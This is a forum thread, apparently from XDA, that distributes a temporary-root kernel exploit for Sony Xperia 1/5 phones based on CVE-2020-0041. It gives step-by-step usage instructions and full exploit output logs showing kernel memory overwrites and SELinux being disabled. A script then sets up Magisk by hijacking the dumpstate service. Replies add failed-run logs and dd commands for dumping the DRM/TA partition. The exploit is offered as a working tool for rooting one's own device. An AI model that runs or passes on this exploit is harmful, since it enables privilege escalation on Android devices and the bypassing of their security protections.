[xperia 1/5] temp root exploit via CVE-2020-0041 including magisk setup

Search This thread

CM users

Member
Dec 1, 2016
36
5
18
Seremban
OK so I'm super new to Sony devices, and I have a Xperia 1 AU Single Sim (SOV40) variant. It's currently on latest Android 11 55.2.C.3.2.1, is this particular firmware supported by the temp root exploit?
 
Last edited:

CM users

Member
Dec 1, 2016
36
5
18
Seremban
@j4nn hi j4nn, I added the firmware list for your exploit. maybe someone needs it for Xperia 1 au (SOV40) By version 55.1.C.0.168
downgraded my xperia 1 au to 55.1.C.0.168 but its not working for me and i have no idea why :

SOV40:/ $ cd /data/local/tmp
SOV40:/data/local/tmp $ ./temp-x1
[+] factoryversion = 'SOV40-55.1.C.0.168'
[+] Mapped 200000
[+] selinux_enforcing before exploit: 1
[+] pipe file: 0xffffffde4aaa1600
[+] file epitem at ffffffde1b9b5f80
[+] Reallocating content of 'write8_inode' with controlled data....[DONE]
[+] Overwriting 0xffffffde4aaa1620 with 0xffffffde1b9b5fd0...[DONE]
[+] Write done, should have arbitrary read now.
[+] file operations: ffffff8be34212d0
[+] kernel base: ffffff8be2080000
[+] init_cred: ffffff8be422d808
[+] memstart_addr: 0xffffffe340000000
[+] First level entry: 118203003 -> next table at ffffffddd8203000
[+] Second level entry: 16e1ad003 -> next table at ffffffde2e1ad000
[+] sysctl_table_root = ffffff8be425d380
[+] Reallocating content of 'write8_sysctl' with controlled data.............[DONE]
[+] Overwriting 0xffffffdeb52bcf68 with 0xffffffdde9e34000...[DONE]
[+] Injected sysctl node!
[+] Reallocating content of 'write8_selinux' with controlled data....[DONE]
[+] Overwriting 0xffffff8be4972ffc with 0x0...[DONE]
[+] Node write8_inode, pid 15486, kaddr ffffffde1fb12980
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Node write8_selinux, pid 15527, kaddr ffffffde5a025e80
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Node write8_sysctl, pid 15545, kaddr ffffffde85dc5f00
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Cleaned up sendmsg threads
[+] epitem.next = ffffffde4aaa1620
[+] epitem.prev = ffffffde4aaa16d0
[+] Launching privileged shell
127|SOV40:/data/local/tmp $ ./magisk-start.sh -1
+ FRESH=false
+ '[' -1 '=' --fresh ']'
+ '[' ! -e /data/adb/magisk/busybox ']'
+ FRESH=true
+ ./magiskpolicy --live --magisk 'allow dumpstate * * *'
Load policy from: /sys/fs/selinux/policy
fopen: /sys/fs/selinux/policy failed with 13: Permission denied
 

Shiro39

Senior Member
Dec 27, 2018
59
23
Indonesia
not sure what's wrong but I can't get it to work

Device: SOV40
Firmware: J8110's Customized UK 55.1.A.0.784

the device rebooted on its own several times previously.
it doesn't reboot anymore, but it also still doesn't elevate the privillege shell


Code:
D:\Utility\scrcpy>adb shell
J8110:/ $ cd /data/local/tmp
J8110:/data/local/tmp $ ./x1x5-mroot
[+] factoryversion = 'J8110-55.1.A.0.748'
[+] Mapped 200000
[+] selinux_enforcing before exploit: 1
[+] pipe file: 0xffffffe323c3dc00
[+] file epitem at ffffffe42b6b5f80
[+] Reallocating content of 'write8_inode' with controlled data.........[DONE]
[+] Overwriting 0xffffffe323c3dc20 with 0xffffffe42b6b5fd0...[DONE]
[+] Write done, should have arbitrary read now.
[+] file operations: ffffff9d478212d0
[+] kernel base: ffffff9d46480000
[+] init_cred: ffffff9d4862d808
[+] memstart_addr: 0xffffffddc0000000
[+] First level entry: 15a221003 -> next table at ffffffe39a221000
[+] Second level entry: 1ebb56003 -> next table at ffffffe42bb56000
[+] sysctl_table_root = ffffff9d4865d380
[+] Reallocating content of 'write8_sysctl' with controlled data...........[DONE]
[+] Overwriting 0xffffffe4352bcb68 with 0xffffffe41a62b000...[DONE]
[+] Injected sysctl node!
[+] Reallocating content of 'write8_selinux' with controlled data...[DONE]
[+] Overwriting 0xffffff9d48d71ffc with 0x0...[DONE]
[+] Node write8_inode, pid 13045, kaddr ffffffe42b548680
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Node write8_selinux, pid 12606, kaddr ffffffe365a51380
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Node write8_sysctl, pid 12915, kaddr ffffffe39dc8ad00
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Cleaned up sendmsg threads
[+] epitem.next = ffffffe323c3dc20
[+] epitem.prev = ffffffe323c3dcd0
[+] Launching privileged shell
J8110:/data/local/tmp $ ./magisk-start.sh -1
+ FRESH=false
+ '[' -1 '=' --fresh ']'
+ '[' ! -e /data/adb/magisk/busybox ']'
+ FRESH=true
+ ./magiskpolicy --live --magisk 'allow dumpstate * * *'
Load policy from: /sys/fs/selinux/policy
fopen: /sys/fs/selinux/policy failed with 13: Permission denied
1|J8110:/data/local/tmp $


I replaced two .sin files from J9110's Customized SEA firmware, to get VoLTE working.
but I don't think that matters...
Code:
oem_other_X-FLASH-CUST-A2CD.sin
oem_X-FLASH-CUST-A2CD.sin
 

pEtErtgh

Member
Jul 24, 2022
10
0
I try on J9110 with storefront firmwre is the same with the number built in the list above mention : but when I enter to this and it stopped, a few time to try again it has restart

code log :

J9110:/ $ cd /data/local/tmp
J9110:/data/local/tmp $ unzip x1x5-mroot.zip
Archive: x1x5-mroot.zip
replace magisk-start.sh? [y]es, [n]o, [A]ll, [N]one: A
inflating: magisk-start.sh
inflating: magisk-setup.sh
inflating: x1x5-mroot
J9110:/data/local/tmp $ unzip x1x5-mroot.zip
Archive: x1x5-mroot.zip
replace magisk-start.sh? [y]es, [n]o, [A]ll, [N]one: A
inflating: magisk-start.sh
inflating: magisk-setup.sh
inflating: x1x5-mroot
J9110:/data/local/tmp $ chmod 755 x1x5-mroot magisk-setup.sh magisk-start.sh
J9110:/data/local/tmp $ ./magisk-setup.sh
+ '[' '' '=' --cleanup ']'
+ ZIPFILE=Magisk-v20.4.zip
+ '[' ! -d magisk ']'
J9110:/data/local/tmp $ cd /data/local/tmp
J9110:/data/local/tmp $ ./x1x5-mroot
[+] factoryversion = 'J9110-55.1.A.3.107'
[+] Mapped 200000
[+] selinux_enforcing before exploit: 1
[+] pipe file: 0xffffffc1e9781200
[+] file epitem at ffffffc21cd1bd80
[+] Reallocating content of 'write8_inode' with controlled data..............


restart after 'data.........'


try again many times but cannot finish.
 

Aqq123

Senior Member
Aug 27, 2009
235
293
Google Nexus 4
Nexus 7
I try but it show cannot find TA file inside
What was the output from dd then? It needs to be run as superuser (so use su for that).
Another way to run it, as a single command:

adb shell su -c dd if=/dev/block/bootdevice/by-name/TA of=/data/local/tmp/TA.bin

Then, assuming it worked:

adb shell su -c chown shell.shell /data/local/tmp/TA.bin

And you should be able to copy the file.
 

pEtErtgh

Member
Jul 24, 2022
10
0
What was the output from dd then? It needs to be run as superuser (so use su for that).
Another way to run it, as a single command:

adb shell su -c dd if=/dev/block/bootdevice/by-name/TA of=/data/local/tmp/TA.bin

Then, assuming it worked:

adb shell su -c chown shell.shell /data/local/tmp/TA.bin

And you should be able to copy the file.
how to copy file ? go to inside phone directly ? go to /data/local/tmp/ and copy ?
 

pEtErtgh

Member
Jul 24, 2022
10
0
What was the output from dd then? It needs to be run as superuser (so use su for that).
Another way to run it, as a single command:

adb shell su -c dd if=/dev/block/bootdevice/by-name/TA of=/data/local/tmp/TA.bin

Then, assuming it worked:

adb shell su -c chown shell.shell /data/local/tmp/TA.bin

And you should be able to copy the file.
it show :
16384+0 records in
16384+0 records out
8388608 bytes (8.0 M) copied, 0.036710 s, 218 M/s

but dont know which is command line to copy and take out to save it ?
 

Aqq123

Senior Member
Aug 27, 2009
235
293
Google Nexus 4
Nexus 7
it show :
16384+0 records in
16384+0 records out
8388608 bytes (8.0 M) copied, 0.036710 s, 218 M/s

but dont know which is command line to copy and take out to save it ?
So it worked. A dump of the TA partition is in the file /data/local/tmp/TA.bin. You can copy it however you want, for example with:

adb pull /data/local/tmp/TA.bin

Alternatively, use some filesystem explorer app like Solid Explorer.
 

pEtErtgh

Member
Jul 24, 2022
10
0
So it worked. A dump of the TA partition is in the file /data/local/tmp/TA.bin. You can copy it however you want, for example with:

adb pull /data/local/tmp/TA.bin

Alternatively, use some filesystem explorer app like Solid Explorer.

cannot backup cause can't find or save ta file from

/data/local/tmp/


although when check it shows that clearly below :

it show :
16384+0 records in
16384+0 records out
8388608 bytes (8.0 M) copied, 0.036710 s, 218 M/s


But try many method but it show that cannot fine or the file doesn't exist ( I don't remember code log cause I have only 1 main phone so waste time to give proof ).

And I also try to backup via flashtool (temp rooted ), many backupTA tool version from many post in XDA but in general: no way to backup them.
 

Top Liked Posts

  • There are no posts matching your filters.
  • 22
    temp root exploit for sony XPERIA 1 and XPERIA 5 with android 10 firmware
    including temporal magisk setup from the exploit

    The exploit uses CVE-2020-0041 originally designed for Pixel 3 running kernel 4.9.
    This is a modification of the Pixel 3 specific exploit to be compatible with kernel 4.14 that is used with xperia 1/5 phones.
    This work has been done in collaboration with @bb-qq, who has implemented support of JP model of xperia 1.
    The exploit is extended in a way allowing setup of magisk v20.4 from the temp root, including working su permission asking notification support.
    It uses some novel techniques to overcome the limitations caused by magisk run from a temp root instead of being integrated in boot process as android service.
    There are also many extensions implemented to make the exploit stable with kernel 4.14.

    SUPPORTED TARGETS
    The exploit has been tested only with the JP model of xperia 1 (the 802SO-55.1.B.0.202 target), but support for other targets have been implemented based on static analysis of each kernel image from target firmware.
    Please note, it is unlikely that any other fw version than those listed above would work.
    The only (unlikely) case when the exploit could work with different fw version (or different phone model) would be that they would use binary identical kernel image in the firmware.

    USAGE HOWTO INCLUDING MAGISK SETUP
    • be sure to run supported firmware version on your phone (you may need to downgrade, involving factory reset)
    • enable developer mode options and in there adb debugging (eventually install adb drivers)
    • download the x1x5-mroot.zip with the exploit attached in this post
    • download Magisk-v20.4.zip from magisk releases page on github here
    • use 'adb push x1x5-mroot.zip Magisk-v20.4.zip /data/local/tmp' to copy the zips to the phone
    • unzip and prepare magisk setup with following commands in 'adb shell'
      Code:
      cd /data/local/tmp
      unzip x1x5-mroot.zip
      chmod 755 x1x5-mroot magisk-setup.sh magisk-start.sh
      ./magisk-setup.sh
    • get temp root and start magisk up with following commands in 'adb shell' - do not copy paste them all at once, but enter (or copy&paste) each line separately one by one:
      Code:
      cd /data/local/tmp
      ./x1x5-mroot
      ./magisk-start.sh -1
      ./magisk-start.sh -2
      ./magisk-start.sh -3

    If it worked, you should see something like this:

    Code:
    802SO:/ $ cd /data/local/tmp
    802SO:/data/local/tmp $ ./x1x5-mroot
    [+] factoryversion = '802SO-55.1.B.0.202'
    [+] Mapped 200000
    [+] selinux_enforcing before exploit: 1
    [+] pipe file: 0xffffffe5cd6e3b00
    [+] file epitem at ffffffe54d87eb00
    [+] Reallocating content of 'write8_inode' with controlled data..[DONE]
    [+] Overwriting 0xffffffe5cd6e3b20 with 0xffffffe54d87eb50...[DONE]
    [+] Write done, should have arbitrary read now.
    [+] file operations: ffffff90392212d0
    [+] kernel base: ffffff9037e80000
    [+] init_cred: ffffff903a02d808
    [+] memstart_addr: 0xffffffdbc0000000
    [+] First level entry: 145437003 -> next table at ffffffe585437000
    [+] Second level entry: 1e6b41003 -> next table at ffffffe626b41000
    [+] sysctl_table_root = ffffff903a05d380
    [+] Reallocating content of 'write8_sysctl' with controlled data.[DONE]
    [+] Overwriting 0xffffffe6352bcb68 with 0xffffffe54b8a3000...[DONE]
    [+] Injected sysctl node!
    [+] Reallocating content of 'write8_selinux' with controlled data.[DONE]
    [+] Overwriting 0xffffff903a772ffc with 0x0...[DONE]
    [+] Node write8_inode, pid 10824, kaddr ffffffe4e3d18c00
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Node write8_selinux, pid 11452, kaddr ffffffe58324c400
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Node write8_sysctl, pid 11338, kaddr ffffffe4e3c05980
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Cleaned up sendmsg threads
    [+] epitem.next = ffffffe5cd6e3b20
    [+] epitem.prev = ffffffe5cd6e3bd0
    [+] Launching privileged shell
    root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -1
    + FRESH=false
    + '[' -1 '=' --fresh ']'
    + '[' ! -e /data/adb/magisk/busybox ']'
    + FRESH=true
    + ./magiskpolicy --live --magisk 'allow dumpstate * * *'
    Load policy from: /sys/fs/selinux/policy
    root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -2
    + FRESH=false
    + '[' -2 '=' --fresh ']'
    + '[' ! -e /data/adb/magisk/busybox ']'
    + FRESH=true
    + STAGE=2
    + '[' 2 '=' 2 ']'
    + mount -t tmpfs -o 'mode=755' none /sbin
    + chcon u:object_r:rootfs:s0 /sbin
    + chmod 755 /sbin
    + cp -a magisk/boot_patch.sh /sbin
    + cp -a magisk/magiskboot /sbin
    + cp -a magisk/magiskinit64 /sbin
    + cp -a magisk/busybox /sbin
    + cp -a magisk/util_functions.sh /sbin
    + cd /sbin
    + chmod 755 boot_patch.sh busybox magiskboot magiskinit64 util_functions.sh
    + mkdir r
    + mount -o bind / r
    + cp -a r/sbin/. /sbin
    + umount r
    + rmdir r
    + mv magiskinit64 magiskinit
    + ./magiskinit -x magisk magisk
    + ln -s /sbin/magiskinit /sbin/magiskpolicy
    + ln -s /sbin/magiskinit /sbin/supolicy
    + true
    + rm -rf /data/adb/magisk.db /data/adb/magisk
    + mkdir -p /data/adb/magisk
    + chmod 700 /data/adb
    + cp -a busybox /data/adb/magisk
    + cp -a magisk /data/adb/magisk
    + cp -a magiskboot /data/adb/magisk
    + cp -a magiskinit /data/adb/magisk
    + cp -a util_functions.sh /data/adb/magisk
    + cp -a boot_patch.sh /data/adb/magisk
    + chmod -R 755 /data/adb/magisk
    + chown -R root:root /data/adb/magisk
    + chcon -R u:object_r:magisk_file:s0 /data/adb/magisk
    + rm -f magiskboot util_functions.sh boot_patch.sh
    + ln -s /sbin/magisk /sbin/su
    + ln -s /sbin/magisk /sbin/resetprop
    + ln -s /sbin/magisk /sbin/magiskhide
    + mkdir /sbin/.magisk
    + chmod 755 /sbin/.magisk
    + >/sbin/.magisk/config
    + echo 'KEEPVERITY=true'
    + >>/sbin/.magisk/config
    + echo 'KEEPFORCEENCRYPT=true'
    + chmod 000 /sbin/.magisk/config
    + mkdir -p /sbin/.magisk/busybox
    + chmod 755 /sbin/.magisk/busybox
    + mv busybox /sbin/.magisk/busybox
    + mkdir -p /sbin/.magisk/mirror
    + chmod 000 /sbin/.magisk/mirror
    + mkdir -p /sbin/.magisk/block
    + chmod 000 /sbin/.magisk/block
    + mkdir -p /sbin/.magisk/modules
    + chmod 755 /sbin/.magisk/modules
    + mkdir -p /data/adb/modules
    + chmod 755 /data/adb/modules
    + mkdir -p /data/adb/post-fs-data.d
    + chmod 755 /data/adb/post-fs-data.d
    + mkdir -p /data/adb/service.d
    + chmod 755 /data/adb/service.d
    + chcon -R -h u:object_r:rootfs:s0 /sbin/.magisk
    + chcon u:object_r:magisk_file:s0 /sbin/.magisk/busybox/busybox
    + /sbin/magisk --daemon
    client: launching new main daemon process
    + pidof magiskd
    + MP=14100
    + '[' -z 14100 ']'
    + >/sbin/.magisk/escalate
    + echo 14100
    + '[' -e /sbin/.magisk/escalate ']'
    + sleep 1
    + '[' -e /sbin/.magisk/escalate ']'
    root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -3
    + FRESH=false
    + '[' -3 '=' --fresh ']'
    + '[' ! -e /data/adb/magisk/busybox ']'
    + STAGE=3
    + '[' 3 '=' 2 ']'
    + >/sbin/.magisk/magiskd
    + echo -e '#!/system/bin/sh\n/sbin/magisk --daemon'
    + chmod 755 /sbin/.magisk/magiskd
    + chcon u:object_r:dumpstate_exec:s0 /sbin/.magisk/magiskd
    + getprop init.svc.dumpstate
    + SVC=''
    + timeout=10
    + '[' 10 -gt 0 ']'
    + stop dumpstate
    + killall -9 magiskd
    + stop dumpstate
    + mount -o bind /sbin/.magisk/magiskd /system/bin/dumpstate
    + start dumpstate
    + timeout=10
    + '[' 10 -le 0 ']'
    + pidof magiskd
    + MP=14131
    + '[' -n 14131 ']'
    + break
    + stop dumpstate
    + sleep 1
    + umount /system/bin/dumpstate
    + rm -f /sbin/.magisk/magiskd
    + '[' '' '=' running ']'
    + rm -f /dev/.magisk_unblock
    + /sbin/magisk --post-fs-data
    + timeout=10
    + '[' -e /dev/.magisk_unblock -o 10 -le 0 ']'
    + sleep 1
    + timeout=9
    + '[' -e /dev/.magisk_unblock -o 9 -le 0 ']'
    + /sbin/magisk --service
    + sleep 1
    + /sbin/magisk --boot-complete
    + chmod 751 /sbin
    root_by_cve-2020-0041:/data/local/tmp # id
    uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:magisk:s0
    root_by_cve-2020-0041:/data/local/tmp # uname -a
    Linux localhost 4.14.117-perf+ #1 SMP PREEMPT Wed Jan 15 23:36:28 2020 aarch64
    root_by_cve-2020-0041:/data/local/tmp # getenforce
    Permissive

    Now you can exit the temp root shell and use 'su' to get a root shell controlled by magisk manager or allow other apps that need root as asking for root permission should work now.
    Please be sure to use 'exit' command to cleanly end the temp root shell. Do not close the window instead. It is needed for proper cleanup.

    Please be careful what you use the temp root for.
    Changing something in partitions protected by dm-verity (or Android Verified Boot 2.0), like for example /system, /vendor or kernel boot image, can result with a not anymore booting phone.
    This is why it is called 'temp root' - you get a root shell only temporarily, it is lost with reboot and it does not allow to make permanent changes in crucial partitions - you would need to unlock bootloader for that.
    Some partitions might still be possible to modify - for example in case of sony xperia xz1 phones it was possible to do permanent debloat via changes in /oem partition and such debloat would survive even factory reset. Similarly some modem configs have been present in /oem allowing to setup IMS for different operators/regions or tune other modem related stuff.

    DRM KEY / TA PARTITION BACKUP POSSIBILITY
    Please note, this exploit will get you a root shell with still locked xperia 1 and 5 phones that could allow to backup TA partition in still locked state, having drm keys (the device key) still there.
    Even though xperia 1 and 5 allows to relock bootloader after unlock, possibly returning drm functionalities, it is very probable that a device key (device specific drm key residing in 66667 ta unit) is still erased on bootloader unlock (and re-lock), so backing up and restoring TA with the key present may actually be useful.
    This is something to be tested - anybody considering bootloader unlock of xperia 1 or 5, please be sure to backup TA from still locked state via this exploit and also TA after unlock for comparison.
    For more details see here and following post.

    SOURCES
    Exploit sources are available at my github here.

    CREDITS
    Big thanks to Blue Frost Security for the excellent writeup and the exploit itself.
    Thanks to @bb-qq for initial xperia 1 support and testing.

    DONATIONS
    If you like my work, you can donate using the Donate to Me button with several methods there.
    Thank you very much to all who donate.

    DOWNLOAD
    4
    Thank you for publishing this!
    Here is all FTFs for Japanese models:
    https://ftf.andro.plus/
    2
    just tried restoring the locked ta backup
    It is not able to circumvent the Has Ever Been Unlocked state, so seems like it is stored somewhere else and thus TA backup makes no sense... In Russia the warranty would be still void if unlocked, no matter the issue.

    Assuming you first re-locked the phone and then restored the locked TA from the exploit root shell.

    It is not only about the "Has Ever Been Unlocked" flag.
    There is a possibility, that if you re-lock the bootloader _and_ restore locked TA backup, that you get all drm functionality back.
    You can check your TA-unlocked.img if bootloader unlock did erase the device key, i.e. 66667 TA unit.
    While this unit should be present in the TA-locked.img.

    You can check the unit in both images by use of 'readta' command line utility, source code available here:
    Alternatively you can find built windows executable attached.

    Could you please check it, like in following way:
    Code:
    E:\mingw>readta.exe
    Usage: readta -i <ta image or partition> -u <unit> [ -o <output file> -q ]
    
    E:\mingw>readta.exe -i TA-locked.img -u 66667 -h
    15 42 87 AF 49 7C 62 37 A4 34 F7 08 C8 3F 20 0B
    E:\mingw>readta.exe -i TA-unlocked.img -u 66667 -h
    
    E:\mingw>
    This should confirm (or not) if sony erases drm key with bootloader unlock, possibly therefore loosing some drm feature(s) that would not be restored by bootloader re-lock, as already suspected here.
    2
    @TrustAugustus, with a functional twrp it would not be a temp root any more, would be?
    Just backup TA partition and then unlock the bootloader.
    You can re-lock with xperia 1/5 if you need.
    After re-lock, use the temp root again and restore the locked state TA backup.